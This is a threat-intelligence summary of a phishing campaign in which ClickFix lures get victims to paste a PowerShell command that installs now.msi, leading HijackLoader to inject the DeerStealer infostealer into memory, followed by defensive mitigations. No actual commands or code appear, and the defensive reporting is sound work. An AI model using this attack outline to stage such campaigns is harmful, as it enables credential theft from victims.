Full Report
Cyber-attacks using HijackLoader and DeerStealer have been identified exploiting phishing tactics via ClickFix
Analysis Summary
# Threat Actor: Unspecified Group leveraging HijackLoader and DeerStealer
## Attribution & Identity
The article describes a campaign rather than attributing it to a specific named threat actor group. The activity is being tracked by eSentire’s Threat Response Unit (TRU). DeerStealer malware is noted to be marketed on dark-web forums by a user named **LuciferXfiles**.
## Activity Summary
A new wave of cyber-attacks has been observed utilizing **HijackLoader** and **DeerStealer**. The campaign begins with phishing tactics designed to lure victims into executing malicious commands. The initial access vector is identified as **ClickFix**. Victims are redirected to a phishing page that forces them to run a PowerShell command via the Windows Run prompt. This command downloads an installer (`now.msi`), which initiates a chain of execution leading to the deployment of HijackLoader, which subsequently injects the DeerStealer payload into memory. HijackLoader has been active since at least 2023.
## Tactics, Techniques & Procedures
- Initial access via phishing, leveraging **ClickFix** for redirection.
- Execution of a PowerShell command via the Windows Run prompt, prompted by the phishing page.
- Deployment of a staged installer (`now.msi`).
- Use of **HijackLoader** for malware delivery and evasion.
- Use of **steganography** by HijackLoader to hide configuration data within PNG images.
- Exploitation of legitimate binaries to run unsigned malicious code.
- In-memory injection of the secondary payload (DeerStealer).
- Use of DeerStealer as an infostealer (subscription-based offering).
## Targeting
- Sectors: Not explicitly detailed, but the nature of the malware (infostealer) suggests targeting organizations or individuals with valuable data.
- Geography: Not specified in the provided text.
- Victims: No specific organizations are mentioned.
## Tools & Infrastructure
- Malware families used: **HijackLoader** (loader), **DeerStealer** (infostealer, also marketed as XFiles Spyware).
- Infrastructure: **ClickFix** (Initial Access Vector/Redirector).
- Other mentioned artifacts: PowerShell commands, `now.msi` (installer).
- URLs/IPs: None specified for C2 or infrastructure configuration in the summary text.
## Implications
This campaign demonstrates a sophisticated multi-stage chain leveraging established malware like HijackLoader for obfuscation (steganography and in-memory injection) to successfully deploy a powerful, feature-rich infostealer (DeerStealer). The subscription model for DeerStealer suggests an ecosystem encouraging widespread distribution of this capability across different criminal operations.
## Mitigations
Defense recommendations are implied from the observed TTPs:
- Enhanced security awareness training to protect against phishing lures that direct users to execute PowerShell commands.
- Monitoring for unusual execution of PowerShell via the Windows Run prompt.
- Implementing robust endpoint detection and response (EDR) capable of detecting in-memory injection and exploitation of legitimate binaries (Living Off The Land techniques).
- Scrutiny of files downloaded via initial web redirection or installers like MSI packages.